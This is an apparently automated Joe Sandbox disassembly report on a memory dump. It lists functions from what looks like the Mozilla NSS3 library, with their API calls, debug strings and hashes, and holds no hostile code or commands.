Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 051018dcfa50dffc612de6d48dcfa6c702b143fd8207df6c7fa8d1c6e4e0b8d0
Instruction ID: 4ce7dd9b7a66c0cbf25a5be51f9d9494a58c485b8697a3c1b4ab00d184ef171d
Opcode Fuzzy Hash: 051018dcfa50dffc612de6d48dcfa6c702b143fd8207df6c7fa8d1c6e4e0b8d0
Instruction Fuzzy Hash: 48917EB6A00611CFCB10DF18C88085ABBF5FF59318729856DD8195BB26E732FD4ACB90

Function 6C808DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C808E22
EnterCriticalSection.KERNEL32(?), ref: 6C808E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C808E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C808E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C808E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C808EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C808EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C808EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C808F00
free.MOZGLUE(?), ref: 6C808F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C808F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C808F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C808F5B
PR_Unlock.NSS3(?), ref: 6C808F72
PR_Unlock.NSS3(?), ref: 6C808F82

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 77edb90b98cf482d3a1ef9f3f9deb312ac0b00941785eff43dfea419c5de62a9
Instruction ID: bde00bf0ce177e72c87281589f06953af02f2319cec45ee257d52f8a07c1f7ad
Opcode Fuzzy Hash: 77edb90b98cf482d3a1ef9f3f9deb312ac0b00941785eff43dfea419c5de62a9
Instruction Fuzzy Hash: 8A5107B2F002159FEB209F68CD8496AB7B9EF55758F18492AEC089B700E731ED8487D1

Function 6C82CE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6C82CE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C82CEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6C82CED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6C82CEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6C82CF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C82CF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6C82CF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6C82CF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6C82CF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6C82CFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6C82CFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6C82CFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6C82CFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6C82D007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6C82D021

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: 413f57c326e670582dc8537d504590f4c7b66bdf31d4c31774250d9b9319313f
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: A331C572B1692423EF6D005F6E25FDE044A4F6230EF040839F90AE67C1F68D8A4742E9

Function 6C900FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6C901000

Part of subcall function 6C8B9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C7E1A48), ref: 6C8B9BB3
Part of subcall function 6C8B9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C7E1A48), ref: 6C8B9BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C901016

Part of subcall function 6C89C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C89C2BF

PR_Unlock.NSS3(?), ref: 6C901021

Part of subcall function 6C89DD70: TlsGetValue.KERNEL32 ref: 6C89DD8C
Part of subcall function 6C89DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C89DDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C901046
PR_Unlock.NSS3(?), ref: 6C90106B
PR_Lock.NSS3 ref: 6C901079
PR_Unlock.NSS3 ref: 6C901096
free.MOZGLUE(?), ref: 6C9010A7
free.MOZGLUE(?), ref: 6C9010B4
PR_DestroyCondVar.NSS3(?), ref: 6C9010BF
PR_DestroyCondVar.NSS3(?), ref: 6C9010CA
PR_DestroyCondVar.NSS3(?), ref: 6C9010D5
PR_DestroyCondVar.NSS3(?), ref: 6C9010E0
PR_DestroyLock.NSS3(?), ref: 6C9010EB
free.MOZGLUE(?), ref: 6C901105

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: 3c407ae736d23eecbdeeed5d38438f99c8508805daf5882a52c4cad108de5499
Instruction ID: cf80dca4ac3b534f9c9958a8cde4aaebf4511aa467e95b8f5135f55eb57276f1
Opcode Fuzzy Hash: 3c407ae736d23eecbdeeed5d38438f99c8508805daf5882a52c4cad108de5499
Instruction Fuzzy Hash: 1F31ADB5A00401ABDB11AF18EE46A45B775BF0231DB584535E80912FA1E772F978DBC2

Function 6C83EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C83EE0B

Part of subcall function 6C850BE0: malloc.MOZGLUE(6C848D2D,?,00000000,?), ref: 6C850BF8
Part of subcall function 6C850BE0: TlsGetValue.KERNEL32(6C848D2D,?,00000000,?), ref: 6C850C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C83EEE1

Part of subcall function 6C831D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C831D7E
Part of subcall function 6C831D50: EnterCriticalSection.KERNEL32(?), ref: 6C831D8E
Part of subcall function 6C831D50: PR_Unlock.NSS3(?), ref: 6C831DD3

TlsGetValue.KERNEL32 ref: 6C83EE51
EnterCriticalSection.KERNEL32(?), ref: 6C83EE65
PR_Unlock.NSS3(?), ref: 6C83EEA2
free.MOZGLUE(?), ref: 6C83EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C83EED0
PR_Unlock.NSS3(?), ref: 6C83EF48
free.MOZGLUE(?), ref: 6C83EF68
PR_SetError.NSS3(00000000,00000000), ref: 6C83EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C83EFA4
free.MOZGLUE(?), ref: 6C83EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C83F055
free.MOZGLUE(?), ref: 6C83F060

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: bbbe601666e3857372ebe1b06b3d17df68f390ffdfce3721bb020678a2df62c4
Instruction ID: 2fa412c1a2d7e1d886afc476ec180d581bc16de23aad9f2a319ca8061cb77239
Opcode Fuzzy Hash: bbbe601666e3857372ebe1b06b3d17df68f390ffdfce3721bb020678a2df62c4
Instruction Fuzzy Hash: 7F8180B1A00219AFDF10DFA8DD85ADE77B5BF08308F546824E908A3751E771E924CBE1

Function 6C804CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C804D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C804D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C804DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C804E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C804E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C804E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C804E85
DER_Encode_Util.NSS3(?,?,6C9505A4,00000000), ref: 6C804EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C804F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C804F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C804F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C804F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C804F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C804FC8

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: dd79696114bab55b0c83a497cefebd285431b6bf18fd034f4c399416b64f9ac0
Instruction ID: cbd076645995525fc131ce62721aa085ff806d96bb9890d59c67a053cff65f4b
Opcode Fuzzy Hash: dd79696114bab55b0c83a497cefebd285431b6bf18fd034f4c399416b64f9ac0
Instruction Fuzzy Hash: E681AE71A48301AFE721CF28DE80B5AB7E4ABD4358F148D2DF958DB641E771E904CB92

Function 6C800470 Relevance: 21.2, APIs: 14, Instructions: 206timeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C8004B7

Part of subcall function 6C850FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7F87ED,00000800,6C7EEF74,00000000), ref: 6C851000
Part of subcall function 6C850FF0: PR_NewLock.NSS3(?,00000800,6C7EEF74,00000000), ref: 6C851016
Part of subcall function 6C850FF0: PL_InitArenaPool.NSS3(00000000,security,6C7F87ED,00000008,?,00000800,6C7EEF74,00000000), ref: 6C85102B

PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C800539

Part of subcall function 6C851200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7F88A4,00000000,00000000), ref: 6C851228
Part of subcall function 6C851200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C851238
Part of subcall function 6C851200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7F88A4,00000000,00000000), ref: 6C85124B
Part of subcall function 6C851200: PR_CallOnce.NSS3(6C952AA4,6C8512D0,00000000,00000000,00000000,?,6C7F88A4,00000000,00000000), ref: 6C85125D
Part of subcall function 6C851200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C85126F
Part of subcall function 6C851200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C851280
Part of subcall function 6C851200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C85128E
Part of subcall function 6C851200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C85129A
Part of subcall function 6C851200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C8512A1

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C80054A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C80056D
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8005CA
DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C8005EA
PR_SetError.NSS3(FFFFE00C,00000000), ref: 6C8005FD
PR_SetError.NSS3(FFFFE07E,00000000), ref: 6C800621
PR_EnterMonitor.NSS3 ref: 6C80063E
PR_ExitMonitor.NSS3 ref: 6C800668
CERT_DestroyCertificate.NSS3(?), ref: 6C800697
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C8006AC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C8006CC
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8006DA

Part of subcall function 6C7FE6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6C8004DC,?,?), ref: 6C7FE6C9
Part of subcall function 6C7FE6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6C8004DC,?,?), ref: 6C7FE6D9
Part of subcall function 6C7FE6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6C8004DC,?,?), ref: 6C7FE6F4
Part of subcall function 6C7FE6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6C8004DC,?), ref: 6C7FE703
Part of subcall function 6C7FE6B0: CERT_FindCertIssuer.NSS3(?,?,6C8004DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7FE71E

Part of subcall function 6C7FF660: PR_EnterMonitor.NSS3(6C80050F,?,00000001,?,?,?), ref: 6C7FF6A8
Part of subcall function 6C7FF660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6C7FF6C1
Part of subcall function 6C7FF660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6C7FF7C8

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
String ID:
API String ID: 2470852775-0
Opcode ID: eb716d3cfbc408c38a29e4917eead1224822f02b6290f3e5d2739475e51fec3b
Instruction ID: 9f6d594fff2b2b5c74239cc2f72000f82955900a7bbcfb013fd42966b54e458b
Opcode Fuzzy Hash: eb716d3cfbc408c38a29e4917eead1224822f02b6290f3e5d2739475e51fec3b
Instruction Fuzzy Hash: EE61F571B043459FEB20CE58CE40B5B77E5AF84358F104D28F969A7791E730E918CB92

Function 6C838F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C839582), ref: 6C838F5B

Part of subcall function 6C84BE30: SECOID_FindOID_Util.NSS3(6C80311B,00000000,?,6C80311B,?), ref: 6C84BE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C838F6A

Part of subcall function 6C850FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7F87ED,00000800,6C7EEF74,00000000), ref: 6C851000
Part of subcall function 6C850FF0: PR_NewLock.NSS3(?,00000800,6C7EEF74,00000000), ref: 6C851016
Part of subcall function 6C850FF0: PL_InitArenaPool.NSS3(00000000,security,6C7F87ED,00000008,?,00000800,6C7EEF74,00000000), ref: 6C85102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C838FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C838FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C91D820,6C839576), ref: 6C838FF9
DER_GetInteger_Util.NSS3(?), ref: 6C83901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C83903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C839062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C8390A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C8390CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C8390F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C83912D
free.MOZGLUE(00000000), ref: 6C839136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C839145

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 6d9afa8da56aa4d1c454e4d7764af76eb3455be73b6fbc5b1a460832cced1ef4
Instruction ID: 70891fb1576edc96fee16681e10c865a36a9a91123073d6520f4aee9d0fb20a6
Opcode Fuzzy Hash: 6d9afa8da56aa4d1c454e4d7764af76eb3455be73b6fbc5b1a460832cced1ef4
Instruction Fuzzy Hash: FD5115B2A043109BE720CF68DD41B9AB7E4AF84318F045939E848D7741EB75E948CBD2

Function 6C8225C0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetSlotList), ref: 6C8225DD
PR_LogPrint.NSS3( pulCount = 0x%p,?), ref: 6C82262A

Part of subcall function 6C9009D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C900BAB
Part of subcall function 6C9009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C900BBA
Part of subcall function 6C9009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C900D7E

PR_LogPrint.NSS3( pSlotList = 0x%p,?), ref: 6C82260F

Part of subcall function 6C9009D0: OutputDebugStringA.KERNEL32(?), ref: 6C900B88
Part of subcall function 6C9009D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C900C5D
Part of subcall function 6C9009D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C900C8D
Part of subcall function 6C9009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C900C9C
Part of subcall function 6C9009D0: OutputDebugStringA.KERNEL32(?), ref: 6C900CD1
Part of subcall function 6C9009D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C900CEC
Part of subcall function 6C9009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C900CFB
Part of subcall function 6C9009D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C900D16
Part of subcall function 6C9009D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C900D26
Part of subcall function 6C9009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C900D35
Part of subcall function 6C9009D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C900D65
Part of subcall function 6C9009D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C900D70
Part of subcall function 6C9009D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C900D90
Part of subcall function 6C9009D0: free.MOZGLUE(00000000), ref: 6C900D99

PR_LogPrint.NSS3( tokenPresent = 0x%x,?), ref: 6C8225F6

Part of subcall function 6C9009D0: PR_Now.NSS3 ref: 6C900A22
Part of subcall function 6C9009D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C900A35
Part of subcall function 6C9009D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C900A66
Part of subcall function 6C9009D0: PR_GetCurrentThread.NSS3 ref: 6C900A70
Part of subcall function 6C9009D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C900A9D
Part of subcall function 6C9009D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C900AC8
Part of subcall function 6C9009D0: PR_vsmprintf.NSS3(?,?), ref: 6C900AE8
Part of subcall function 6C9009D0: EnterCriticalSection.KERNEL32(?), ref: 6C900B19
Part of subcall function 6C9009D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C900B48
Part of subcall function 6C9009D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C900C76
Part of subcall function 6C9009D0: PR_LogFlush.NSS3 ref: 6C900C7E

PR_LogPrint.NSS3( *pulCount = 0x%x,?), ref: 6C822699
PR_LogPrint.NSS3( slotID[%d] = %x,00000000,?), ref: 6C8226C5

Strings

slotID[%d] = %x, xrefs: 6C8226C0
C_GetSlotList, xrefs: 6C8225D8
*pulCount = 0x%x, xrefs: 6C822694
tokenPresent = 0x%x, xrefs: 6C8225F1
pulCount = 0x%p, xrefs: 6C822625
pSlotList = 0x%p, xrefs: 6C82260A

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Print$DebugOutputStringfflush$fwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: *pulCount = 0x%x$ pSlotList = 0x%p$ pulCount = 0x%p$ slotID[%d] = %x$ tokenPresent = 0x%x$C_GetSlotList
API String ID: 2625801553-2918917633
Opcode ID: 17062752c04278bf4f6949ea17e6bc7dcc234af7c8d386ac81d9e5210e993da6
Instruction ID: 141e728ee3ac777198030c89f8a26b3e31b494dad80c559991b0c70023af4337
Opcode Fuzzy Hash: 17062752c04278bf4f6949ea17e6bc7dcc234af7c8d386ac81d9e5210e993da6
Instruction Fuzzy Hash: 7031F032305184AFDB10CF58DE8CE5637B2FB9232DF944829E81487A12DB38DD94CBA1

Function 6C7EAF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C7EAF47

Part of subcall function 6C8B9090: TlsGetValue.KERNEL32 ref: 6C8B90AB
Part of subcall function 6C8B9090: TlsGetValue.KERNEL32 ref: 6C8B90C9
Part of subcall function 6C8B9090: EnterCriticalSection.KERNEL32 ref: 6C8B90E5
Part of subcall function 6C8B9090: TlsGetValue.KERNEL32 ref: 6C8B9116
Part of subcall function 6C8B9090: LeaveCriticalSection.KERNEL32 ref: 6C8B913F

FreeLibrary.KERNEL32(?), ref: 6C7EAF6D
free.MOZGLUE(?), ref: 6C7EAFA4
free.MOZGLUE(?), ref: 6C7EAFAA
PR_ExitMonitor.NSS3 ref: 6C7EAFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C7EAFF5
PR_ExitMonitor.NSS3 ref: 6C7EB005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C7EB014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C7EB028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C7EB03C

Strings

Unloaded library %s, xrefs: 6C7EB023
%s decr => %d, xrefs: 6C7EAFF0

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
